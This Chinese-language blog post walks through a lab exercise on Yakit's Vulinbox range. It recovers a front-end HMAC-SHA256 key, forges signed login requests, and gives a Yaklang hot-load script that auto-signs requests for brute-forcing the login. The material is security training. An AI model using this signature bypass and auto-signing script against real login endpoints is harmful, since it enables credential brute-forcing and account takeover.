本文是高级前端加解密与验签实战的第1篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过SHA256签名来爆破登录。
绕过
通过查看源代码可以看到key为
1234123412341234
通过查看源代码可以看到是通过SHA256来进行签名的,他把请求体的username和password字段提取,然后进行加密。
username=admin&password=admin123
使用Cyberchief加密,最终得到加密值为:fc4b936199576dd7671db23b71100b739026ca9dcb3ae78660c4ba3445d0654d
可以看到自己计算和前端计算的一致:
修改密码,重新构造签名:
username=admin&password=666666
=>
26976ad249c29595c3e9e368d9c3bc772b5a27291515caddd023d69421b7ffee
发送请求,可以看到验签成功,密码正确登陆成功,自此签名绕过成功。
POST /crypto/sign/hmac/sha256/verify HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json{"signature": "26976ad249c29595c3e9e368d9c3bc772b5a27291515caddd023d69421b7ffee","key": "31323334313233343132333431323334","username": "admin","password": "666666"
}
热加载
这是我写的热加载代码,通过beforeRequest劫持请求包,使用encryptData函数进行加密,最终实现热加载自动签名功能。
encryptData = (packet) => {body = poc.GetHTTPPacketBody(packet)params = json.loads(body)//获取账号和密码name = params.usernamepass = params.passwordkey = "31323334313233343132333431323334" //十六进制密钥//HmacSha256加密signText = f`username=${name}&password=${pass}`sign = codec.EncodeToHex(codec.HmacSha256(f`${codec.DecodeHex(key)~}`, signText))//构造请求体result = f`{"username":"${name}","password":"${pass}","signature":"${sign}","key":"${key}"}`return string(poc.ReplaceBody(packet, result, false))
}//发送到服务端修改数据包
// beforeRequest = func(req){
// return encryptData(req)
// }//调试用
packet = <<<TEXT
POST /crypto/sign/hmac/sha256/verify HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json
Content-Length: 179{"username":"admin","password":"admin123"}
TEXT
result = (encryptData(packet))
print(result)
调试结果如下:
把beforeRequest取消注释,添加到Web Fuzzer模块的热加载中:
保存后发送请求,热加载成功实现自动签名功能。
